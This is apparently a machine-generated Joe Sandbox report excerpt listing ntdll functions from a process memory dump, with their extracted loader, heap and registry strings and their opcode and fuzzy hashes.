                                                                          • Opcode ID: c0d12f36a64514bcbea9b675bf52da582c69502d58aa57f2bac0637ef18d832b
                                                                          • Instruction ID: 332ae7b4cf8a8f9714406d30054c7b36e00fdeb36e562de32f0e6763ff14e516
                                                                          • Opcode Fuzzy Hash: c0d12f36a64514bcbea9b675bf52da582c69502d58aa57f2bac0637ef18d832b
                                                                          • Instruction Fuzzy Hash: 0A9129B4E002059FEB18CFA9C884B9DB7F1FF88358F14816AE905AB391E7759841CF54
                                                                          Function 357BB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • TargetNtPath, xrefs: 357BB3AF
                                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 357BB3AA
                                                                          • GlobalizationUserSettings, xrefs: 357BB3B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                          • API String ID: 0-505981995
                                                                          • Opcode ID: c0ce463e15f9a1a3c9f9ef6fe98091a89831e5d49ae3c34cad855934a8e3c893
                                                                          • Instruction ID: 3bad8a029cfb710d93cd8517f53a02a316f794dc0558d8cd8a8a8b254ac9aa9c
                                                                          • Opcode Fuzzy Hash: c0ce463e15f9a1a3c9f9ef6fe98091a89831e5d49ae3c34cad855934a8e3c893
                                                                          • Instruction Fuzzy Hash: F0616C72D01228ABDB21DB55DC9CB9AB7B9FF14710F4101E5A909AB250DBB4DE84CF90
                                                                          Function 356DF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • HEAP: , xrefs: 3573E442
                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3573E455
                                                                          • HEAP[%wZ]: , xrefs: 3573E435
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                          • API String ID: 0-1340214556
                                                                          • Opcode ID: d447d037b37797db1e9f8df33041f58163a442778b204631e4e8d02d663b32c8
                                                                          • Instruction ID: 5f43f41570286a39f24fc71cc98f6440ad0992b10eb8291c01e018d3bbf29438
                                                                          • Opcode Fuzzy Hash: d447d037b37797db1e9f8df33041f58163a442778b204631e4e8d02d663b32c8
                                                                          • Instruction Fuzzy Hash: 95514035705780AFE712CBA8C895F9AFBF9FF04354F0448A4E9418B692D774EA40CB91
                                                                          Function 35701514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3574A396
                                                                          • LdrpCompleteMapModule, xrefs: 3574A39D
                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 3574A3A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                          • API String ID: 0-1676968949
                                                                          • Opcode ID: 8fde3097699a73126a1d7dc088dbbdb7fed30432ef0e2d201df02976dfb24f7e
                                                                          • Instruction ID: 081d5d8d52158fca083e3e3416c43e8bf626756bc9517472bfe312c2adb5cb4c
                                                                          • Opcode Fuzzy Hash: 8fde3097699a73126a1d7dc088dbbdb7fed30432ef0e2d201df02976dfb24f7e
                                                                          • Instruction Fuzzy Hash: 0E51F0B8B047819BE711CB69CD45B1A77F6BB40764F1005A8E9529F6D2EB70E900CF40
                                                                          Function 3578D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3578D7B2
                                                                          • HEAP: , xrefs: 3578D79F
                                                                          • HEAP[%wZ]: , xrefs: 3578D792
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                          • API String ID: 0-3815128232
                                                                          • Opcode ID: e49bef605c7ddcf453f3d874880bf9f23d0aae29cb0396009dc37432469f8484
                                                                          • Instruction ID: 78588558910f41dd39764178109ca89968b80483cd0b3d85330d2423fbbe41f5
                                                                          • Opcode Fuzzy Hash: e49bef605c7ddcf453f3d874880bf9f23d0aae29cb0396009dc37432469f8484
                                                                          • Instruction Fuzzy Hash: 9751077A2047548EF360CE26C84677273E2EB453D4F52484DE4C6CF185EA76D847DBA0
                                                                          Function 356D753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                          • API String ID: 0-1151232445
                                                                          • Opcode ID: 5cdf79ceaa4c9efc31712d7ecfa5a0b04c3d4bf398465f564f7253322c196191
                                                                          • Instruction ID: 9c4c566f078f38f467d54ca6d9555e9f65638467874303009a98b04eff2bc489
                                                                          • Opcode Fuzzy Hash: 5cdf79ceaa4c9efc31712d7ecfa5a0b04c3d4bf398465f564f7253322c196191
                                                                          • Instruction Fuzzy Hash: 90416B782153908FEF24CE28C082B65B7E2AF01364F5448ADC8464F95BDB71D485CBA3
                                                                          Function 357115EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 35751954
                                                                          • LdrpAllocateTls, xrefs: 3575194A
                                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 35751943
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                          • API String ID: 0-4274184382
                                                                          • Opcode ID: aba52e8c0365e2f806c6d1e57b774b519debfbf6623bbb68ccb1cb574b4fe9c0
                                                                          • Instruction ID: 0d48a3d778728f2e422cd4c1c8bd1244aac4952b3d3c882e3254b09d0846ace1
                                                                          • Opcode Fuzzy Hash: aba52e8c0365e2f806c6d1e57b774b519debfbf6623bbb68ccb1cb574b4fe9c0
                                                                          • Instruction Fuzzy Hash: 6C418BB5E01245AFDB14CFA8C950AADBBF1FF48360F148559E806BB301DB35A900CF90
                                                                          Function 3579BD08 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • @, xrefs: 3579BD71
                                                                          • PreferredUILanguages, xrefs: 3579BD92
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 3579BD45
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                          • API String ID: 0-2968386058
                                                                          • Opcode ID: dfebfcaa926be30c8580888140d4f31ab1ca0a5fb1217925a5ba5a2bf75d2c12
                                                                          • Instruction ID: 9fbc10e478f174487214d838fc964d0e92d19ba0ab1dcf8468aa9843b2fe72fb
                                                                          • Opcode Fuzzy Hash: dfebfcaa926be30c8580888140d4f31ab1ca0a5fb1217925a5ba5a2bf75d2c12
                                                                          • Instruction Fuzzy Hash: AD418EB2E04219EBDB15CF94D894FEEB7BDBB44744F404069E609AB280D7759A48CBA0
                                                                          Function 3576B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • @, xrefs: 3576B2F0
                                                                          • GlobalFlag, xrefs: 3576B30F
                                                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3576B2B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                          • API String ID: 0-4192008846
                                                                          • Opcode ID: 4425327345ed34b51360243daf0b30516ce0854b8b81d876b3d41d0770c6c960
                                                                          • Instruction ID: 7e20774170d132a816ec7ba7247c3e9a6c4d71b21019355c0b5704deec6b7a9d
                                                                          • Opcode Fuzzy Hash: 4425327345ed34b51360243daf0b30516ce0854b8b81d876b3d41d0770c6c960
                                                                          • Instruction Fuzzy Hash: FA313CB1E01209AFDB11DF95DC84AEEBBBDEF44744F4004A9EA05AB141DB749E04CB94
                                                                          Function 35711527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • DLL "%wZ" has TLS information at %p, xrefs: 3575184A
                                                                          • LdrpInitializeTls, xrefs: 35751851
                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 3575185B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                          • API String ID: 0-931879808
                                                                          • Opcode ID: 00606a31a677865f69bde095404ba38a283d84e9a8f105441ca2328deb2411c2
                                                                          • Instruction ID: c651954a9fb8a685adcaf718325d7deba38db3deccb8c5bb143682e3c6584eab
                                                                          • Opcode Fuzzy Hash: 00606a31a677865f69bde095404ba38a283d84e9a8f105441ca2328deb2411c2
                                                                          • Instruction Fuzzy Hash: 9831C271F11245ABE720CB56C885F5A7BB9FB403A5F410569E906BF180EBB0AE45CBA0
                                                                          Function 35761D5E Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 35761D84
                                                                          • LdrpInitializationFailure, xrefs: 35761D7A
                                                                          • Process initialization failed with status 0x%08lx, xrefs: 35761D73
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2986994758
                                                                          • Opcode ID: d9a73b305c61d3895d2d0116f8c9fb6a01420ddabeb01899d8423e74cae5c59f
                                                                          • Instruction ID: 5e0eb3f0edf7199fee9bd3fe315d6542cc8acd224ae7dc254ca7fa4eacf37eb5
                                                                          • Opcode Fuzzy Hash: d9a73b305c61d3895d2d0116f8c9fb6a01420ddabeb01899d8423e74cae5c59f
                                                                          • Instruction Fuzzy Hash: 4CF0F675A10794AFD620DB4DCC5AF9937B9EB40778F4100C5FE457B581CBB0A900CA85
                                                                          Function 356F51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@
                                                                          • API String ID: 0-149943524
                                                                          • Opcode ID: 1cbac82b9f718b4008a5b3ca1846f0420e5b1d2122d04f1d4d41caa8d2ace1bf
                                                                          • Instruction ID: 62e00b877327cead842bea26a548bb1d754bd1b9f703e1bf640d5e414301dc6b
                                                                          • Opcode Fuzzy Hash: 1cbac82b9f718b4008a5b3ca1846f0420e5b1d2122d04f1d4d41caa8d2ace1bf
                                                                          • Instruction Fuzzy Hash: 2932BFB4A083118BD724CF14C4A0B2EB7E2FF98744F50491EF9968B690E776DD85CB92
                                                                          Function 356E5622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 3dc9c64a0cf656db3da4dec67b939dc21f1028a57a5ea702e84921e959db0cd9
                                                                          • Instruction ID: 8062326f316057205b10fd5d24d7500f4c2ecf897c0038ba2c7a8ab66324f0b1
                                                                          • Opcode Fuzzy Hash: 3dc9c64a0cf656db3da4dec67b939dc21f1028a57a5ea702e84921e959db0cd9
                                                                          • Instruction Fuzzy Hash: 2631AE35713B02ABE746DF25CA50E8AFBB6BF95754F004115E9014BA60DBB0E821CBC1
                                                                          Function 35769567 Relevance: 3.1, APIs: 2, Instructions: 62timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: bf67ed599178c522af0a5ccda9ac379753ee31338d27d34b920eb968cd42e51c
                                                                          • Instruction ID: 68158c699d1a4885941cb885ba19b24daecbec9f4c2d68e6f2aa057402eb3932
                                                                          • Opcode Fuzzy Hash: bf67ed599178c522af0a5ccda9ac379753ee31338d27d34b920eb968cd42e51c
                                                                          • Instruction Fuzzy Hash: 7911E372B14215AFEB05CB59C988A5EF7F9EB88378F150179E805EB340DB709D01CB94
                                                                          Function 3576174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$AddD
                                                                          • API String ID: 0-2525844869
                                                                          • Opcode ID: 6800f4a6f09bdea4541087fdd9fdf9ce0c03a240e1264faca7eb2f362bf47073
                                                                          • Instruction ID: 89e9be140d44281955373f7eb3f0b54871f79268c3d118d9cb3d07db2b97c193
                                                                          • Opcode Fuzzy Hash: 6800f4a6f09bdea4541087fdd9fdf9ce0c03a240e1264faca7eb2f362bf47073
                                                                          • Instruction Fuzzy Hash: EFA18E76608384AFD315CF14C848FABB7EAFF84708F504A2EF9958A150E770E905CB52
                                                                          Function 35783F54 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$MUI
                                                                          • API String ID: 0-17815947
                                                                          • Opcode ID: 39010ead99969499797d8b0c031e2b598988601ecce9b7efd1d76528a0cd3e11
                                                                          • Instruction ID: e6fe79e7be7a41918354f81af6339d0f198a31c36762b7fbad26c78c6fd05f2a
                                                                          • Opcode Fuzzy Hash: 39010ead99969499797d8b0c031e2b598988601ecce9b7efd1d76528a0cd3e11
                                                                          • Instruction Fuzzy Hash: 455149B5E0020DAEDB11CFA4CC85AEFBBBAEB08758F100529E511FB280D7719D45CB60
                                                                          Function 357BB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 357BB5C4
                                                                          • RedirectedKey, xrefs: 357BB60E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                          • API String ID: 0-1388552009
                                                                          • Opcode ID: e7021e12cc46f0445d7c1eb2a82e0beb6ff63dea6d9f645b40e8bcc091f4b3dc
                                                                          • Instruction ID: ff616d8b2e29b2323c2eb5dbee8a4498c12ff707e3f375c7adeabb8b335cb2ed
                                                                          • Opcode Fuzzy Hash: e7021e12cc46f0445d7c1eb2a82e0beb6ff63dea6d9f645b40e8bcc091f4b3dc
                                                                          • Instruction Fuzzy Hash: 0D6105B5C0021CEFDF11DF95C888ADEBBB9FB48710F50415AE809AB250DB749A45DFA0
                                                                          Function 356D7C85 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @[}5$@[}5@[}5
                                                                          • API String ID: 0-2056036529
                                                                          • Opcode ID: 86a866da85a86226b4f127d279d0bf9e494851361617749ef0760773337849af
                                                                          • Instruction ID: 93203675852241b2bc7e7cc892329c7c256ea6b6e16e6e01aca997b823df0821
                                                                          • Opcode Fuzzy Hash: 86a866da85a86226b4f127d279d0bf9e494851361617749ef0760773337849af
                                                                          • Instruction Fuzzy Hash: 1351B97120634AAFD3218F24C846F1AFBF5BF843A4F04091EE4998BA51E770E804CB92
                                                                          Function 356FF640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$$
                                                                          • API String ID: 3446177414-233714265
                                                                          • Opcode ID: ff013d33cbfe55a988f3fcd113e55134842eb42983bc71d4e9f04fd15b5c92c6
                                                                          • Instruction ID: b04bbe2f6f977db04a25cddc523f5113e87bb94364099bbfa496998f3499c7d9
                                                                          • Opcode Fuzzy Hash: ff013d33cbfe55a988f3fcd113e55134842eb42983bc71d4e9f04fd15b5c92c6
                                                                          • Instruction Fuzzy Hash: 6761DBB6E05749CBEB20CFA4D684B9DF7F6FF44304F104069E515ABA90CB76A980CB85
                                                                          Function 3577314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                          • API String ID: 0-118005554
                                                                          • Opcode ID: 8216121fe1db9c40699858e81aca42d8e38c881fd5d4a63272f762a1bebf8890
                                                                          • Instruction ID: 4da6effc78662ef24355088ba7a539246c056e0e627a5d52d4d9f7596b017280
                                                                          • Opcode Fuzzy Hash: 8216121fe1db9c40699858e81aca42d8e38c881fd5d4a63272f762a1bebf8890
                                                                          • Instruction Fuzzy Hash: 1C31DA752187409BD701CB68E854B2AB7F5FF85714F110869EC558F380EB71D905CB92
                                                                          Function 357131BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Local\$@
                                                                          • API String ID: 0-380025441
                                                                          • Opcode ID: 602ce0affff4cf5d051d9eb930fbc19104f3c8496d040d1dfa9ee32809674382
                                                                          • Instruction ID: 96665265e67c38bd664c057396fadf4acb1c4d993c6f4cf5f4336619b8320d6b
                                                                          • Opcode Fuzzy Hash: 602ce0affff4cf5d051d9eb930fbc19104f3c8496d040d1dfa9ee32809674382
                                                                          • Instruction Fuzzy Hash: 66316CB5609305AFD311DF28C881E5BBBE9FB85794F40092EF9948B250DB35DE098B92
                                                                          Function 357133D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RtlpInitializeAssemblyStorageMap, xrefs: 3575289A
                                                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3575289F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                          • API String ID: 0-2653619699
                                                                          • Opcode ID: 234fdbfd38c5dc11d08a6bed962e655d49a3832670a2dc447f0814d96ecc339f
                                                                          • Instruction ID: 2b107f930b0d5b068ed686d92784500ba7414742f849b0c9e34a21cf88046856
                                                                          • Opcode Fuzzy Hash: 234fdbfd38c5dc11d08a6bed962e655d49a3832670a2dc447f0814d96ecc339f
                                                                          • Instruction Fuzzy Hash: C511E9B6B04315BBF7158A88CD45F6F76AAEB84764F208469BD04DF244DA74EE0087A4
